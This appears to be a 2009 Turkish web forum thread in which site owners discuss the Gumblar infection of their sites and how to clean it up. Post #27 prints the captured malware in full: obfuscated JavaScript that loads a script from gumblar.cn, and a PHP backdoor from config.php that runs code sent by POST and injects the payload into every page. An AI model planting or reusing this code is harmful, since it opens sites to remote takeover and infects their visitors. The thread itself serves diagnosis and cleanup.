• 29-04-2009, 15:21:14
    #19
    Kiki adlı üyeden alıntı: mesajı görüntüle
    Verdigin kodu koysak yerine Duzelecek mi Tam Anlamadım olayı :S
    ben wordpress yazılımcısı değilim anlayamam ama bu js scripti aslında içindeki kodlarla iframe gibi kapı açıyor.

    yani: iframe virüsü

    tarayıcına göre cookie işliyor id üretiyor ürettiği id ile seni aşağıdaki adrese yolluyor

    script src=//gumblar.cn/rss/?id="+j+"><\/script>");}

    birüs ise bu adresin içinde. doğal olarak senin site üzerinden virüsünü yayıyor

    tabi daha detaylısnı wordpressçi arkadaşlar anlatır benden buraya kadar

    kolay gelsin
  • 29-04-2009, 15:24:30
    #20
    O kodları kaldırdığında site çalışmıyormu.
  • 29-04-2009, 15:28:58
    #21
    niphell adlı üyeden alıntı: mesajı görüntüle
    ben wordpress yazılımcısı değilim anlayamam ama bu js scripti aslında içindeki kodlarla iframe gibi kapı açıyor.
    yani: iframe virüsü
    tarayıcına göre cookie işliyor id üretiyor ürettiği id ile seni aşağıdaki adrese yolluyor
    script src=//gumblar.cn/rss/?id="+j+"><\/script>");}
    birüs ise bu adresin içinde. doğal olarak senin site üzerinden virüsünü yayıyor
    tabi daha detaylısnı wordpressçi arkadaşlar anlatır benden buraya kadar
    kolay gelsin
    Eyw Kardeşim Sağulasın.
  • 29-04-2009, 15:29:45
    #22
    Maverick adlı üyeden alıntı: mesajı görüntüle
    O kodları kaldırdığında site çalışmıyormu.
    Onları kaLdırmak Mesele zaten Kardeş Kodlar görükmüyor Görsem Hemen kaldırcam Zaten Sitenin Kaynagına Bakdıgın Zaman Görünüyor.
  • 29-04-2009, 15:35:36
    #23
    kiki geçmiş olsun dostum..
  • 29-04-2009, 15:46:23
    #24
    eyw kardeşim Geçer İnşallah
  • 05-05-2009, 10:56:26
    #25
    Kimlik doğrulama veya yönetimden onay bekliyor.
    Sorun artık wp'cilerin sorunu olmaktan çıktı herkesin sorunu olmaya başladı. Wp ile alakam yok ama aynı sorunu bende yaşamaktayım. Kod birçok dosyanın içine kendini yerleştirmiş bulunuyor kodu silip sayfayı internet tarayıcımda yeniden açıyorum ama görüyorumli virüslü siteye bağlantı yapmaya devam ediyor. Bir sitede cuteftp programı crackleyip kullanan kişilerin başına geldiği iddiası ortaya atılmış, ne yazıkki bende cuteftp kullanıyordum şu dakikaya kadar. Eğer durum bundan ibaretse durum gayet ciddi olacak gibi. Bu sorunu yaşayıpta çözen arkadaşların yardımlarını bekliyoruz.
  • 05-05-2009, 11:06:13
    #26
    kiki bu nasıl virus la 2 siteme bulaşmış net ve com siteleriem index temizledim yeni tema attım ama cırt gene aynı nanayız
  • 05-05-2009, 13:52:15
    #27
    Kimlik doğrulama veya yönetimden onay bekliyor.
    bende bu gün bir arkadaşın sitesinde rastladım, sayfanın kaynak koduna baktığımda


    <script language=javascript><!--
    (function(IkbC){var WVU='%';var aIIf='@76ar@20a@3d@22Scr@69pt@45ngine@22@2cb@3d@22 V@65r@73@69on@28)@2b@22@2c@6a@3d@22@22@2cu@3dn@61v igator@2euse@72Ag@65nt@3bif(@28u@2eindexOf(@22Win@ 22)@3e0@29@26@26(u@2e@69nd@65xOf(@22NT@20@36@22)@3 c@30)@26@26(d@6fcu@6de@6et@2e@63ookie@2eind@65xO@6 6(@22@6diek@3d@31@22@29@3c@30)@26@26(typ@65o@66@28 @7a@72vzts)@21@3dtype@6ff(@22A@22)))@7bzrvzts@3d@2 2@41@22@3bev@61@6c(@22i@66(window@2e@22+a+@22)@6a@ 3d@6a@2b@22+a+@22Ma@6aor@22@2bb+a+@22Mi@6eo@72@22+ b+a+@22B@75ild@22+b+@22@6a@3b@22)@3b@64@6fcum@65n@ 74@2ewrite(@22@3csc@72@69p@74@20src@3d@2f@2fgu@6db la@72@2ec@6e@2frss@2f@3fi@64@3d@22+j@2b@22@3e@3c@5 c@2fscr@69pt@3e@22)@3b@7d';eval(unescape(aIIf.repl ace(IkbC,'%')))})(/@/g);
    --></script>

    böyle javascript kodu var ancak ftp ile dosyayı açtığımda o dosyada bu satırların olmadığını farkettim, ve direk body nin üzerinde yazıyordu, body tag'ını sildiğimde sayfanın en altına yazdığını gördüm, o zaman buraya yazan dosyanın daha yukarıdan geldiğini farktettim, include edilken dosyalara baktığımda,

    <?php if(!function_exists('tmp_lkojfghx')){if(isset($_PO ST['tmp_lkojfghx3']))eval($_POST['tmp_lkojfghx3']);if(!defined('TMP_XHGFJOKL'))define('TMP_XHGFJOKL ',base64_decode('PHNjcmlwdCBsYW5ndWFnZT1qYXZhc2Nya XB0PjwhLS0gCihmdW5jdGlvbihJa2JDKXt2YXIgV1ZVPSclJzt 2YXIgYUlJZj0nQDc2YXJAMjBhQDNkQDIyU2NyQDY5cHRANDVuZ 2luZUAyMkAyY2JAM2RAMjJWQDY1ckA3M0A2OW9uQDI4KUAyYkA yMkAyY0A2YUAzZEAyMkAyMkAyY3VAM2RuQDYxdmlnYXRvckAyZ XVzZUA3MkFnQDY1bnRAM2JpZihAMjh1QDJlaW5kZXhPZihAMjJ XaW5AMjIpQDNlMEAyOUAyNkAyNih1QDJlQDY5bmRANjV4T2YoQ DIyTlRAMjBAMzZAMjIpQDNjQDMwKUAyNkAyNihkQDZmY3VANmR lQDZldEAyZUA2M29va2llQDJlaW5kQDY1eE9ANjYoQDIyQDZka WVrQDNkQDMxQDIyQDI5QDNjQDMwKUAyNkAyNih0eXBANjVvQDY 2QDI4QDdhQDcydnp0cylAMjFAM2R0eXBlQDZmZihAMjJBQDIyK SkpQDdienJ2enRzQDNkQDIyQDQxQDIyQDNiZXZANjFANmMoQDI yaUA2Nih3aW5kb3dAMmVAMjIrYStAMjIpQDZhQDNkQDZhQDJiQ DIyK2ErQDIyTWFANmFvckAyMkAyYmIrYStAMjJNaUA2ZW9ANzJ AMjIrYithK0AyMkJANzVpbGRAMjIrYitAMjJANmFAM2JAMjIpQ DNiQDY0QDZmY3VtQDY1bkA3NEAyZXdyaXRlKEAyMkAzY3NjQDc yQDY5cEA3NEAyMHNyY0AzZEAyZkAyZmd1QDZkYmxhQDcyQDJlY 0A2ZUAyZnJzc0AyZkAzZmlANjRAM2RAMjIrakAyYkAyMkAzZUA zY0A1Y0AyZnNjckA2OXB0QDNlQDIyKUAzYkA3ZCc7ZXZhbCh1b mVzY2FwZShhSUlmLnJlcGxhY2UoSWtiQywnJScpKSl9KSgvQC9 nKTsKIC0tPjwvc2NyaXB0Pg=='));function tmp_lkojfghx($s){if($g=(substr($s,0,2)==chr(31).ch r(139)))$s=gzinflate(substr($s,10,-8));if(preg_match_all('#<script(.*?)</script>#is',$s,$a))foreach($a[0] as $v)if(count(explode("\n",$v))>5){$e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);if((preg_match('#\beval\b#',$ v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos( $v,'document.write')))$s=str_replace($v,'',$s);}$s 1=preg_replace('#<script language=javascript><!-- \ndocument\.write\(unescape\(.+?\n --></script>#','',$s);if(stristr($s,'<body'))$s=preg_re place('#(\s*<body)#mi',TMP_XHGFJOKL.'\1',$s1);else if(($s1!=$s)||stristr($s,'</body')||stristr($s,'</title>'))$s=$s1.TMP_XHGFJOKL;return $g?gzencode($s):$s;}function tmp_lkojfghx2($a=0,$b=0,$c=0,$d=0){$s=array();if($ b&&$GLOBALS['tmp_xhgfjokl'])call_user_func($GLOBALS['tmp_xhgfjokl'],$a,$b,$c,$d);foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='tmp_lkojfghx')return;else $s[]=array($a=='default output handler'?false:$a);for($i=count($s)-1;$i>=0;$i--){$s[$i][1]=ob_get_contents();ob_end_clean();}ob_start('tmp_l kojfghx');for($i=0;$i<count($s);$i++){ob_start($s[$i][0]);echo $s[$i][1];}}}if(($a=@set_error_handler('tmp_lkojfghx2'))!=' tmp_lkojfghx2')$GLOBALS['tmp_xhgfjokl']=$a;tmp_lkojfghx2(); ?>

    bu satırı farktteim, dekode edildiğinde "gumblar.cn/rss" bu linke gidiyor, bu satırı config.php de buldum, biraz araştırdıktan bilgisayarınızdaki virusun bunu yaptığını öğrendim, virus sizin ftp programınızı kullanarak ftp deki tüm hesaplara bağlanıp conf gbi dosyalara php kodlarını yazıyor, yazılan php kodlarıda siteye girdiğinizde açılan sayfalara solucanı dinamik olarak yazıyor

    temizlemenin yolu şöyle;

    ilk önce ftp "programınızdaki" tüm hesapları silin, ardından kaspersky ile bilgisayarınızdaki virus u temizleyin, kaspersky diyorum, diğer virus programları görmedi, virusun temizlediğinize emin olduktan sonra ftp ye yeniden bağlanarak ilgili satırları silin.